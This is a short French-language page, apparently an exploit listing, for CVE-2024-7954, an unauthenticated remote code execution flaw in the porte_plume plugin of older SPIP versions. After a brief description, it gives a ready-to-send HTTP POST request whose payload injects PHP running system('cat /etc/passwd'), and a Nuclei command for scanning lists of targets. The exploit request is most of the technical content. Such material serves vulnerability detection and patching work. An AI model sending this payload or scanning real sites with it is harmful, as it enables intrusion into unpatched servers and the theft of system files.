
Exploit pour CVE-2024-7954, une exécution de code à distance non authentifiée dans le plugin porte_plume de SPIP, avec un modèle Nuclei et une dork Shodan pour la détection.
Le plugin porte_plume utilisé par SPIP avant les versions 4.30-alpha2, 4.2.13 et 4.1.16 est vulnérable à une exécution de code arbitraire. Un attaquant distant et non authentifié peut exécuter du PHP arbitraire avec les droits de l'utilisateur SPIP en envoyant une requête HTTP spécialement conçue. (CRITIQUE)
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml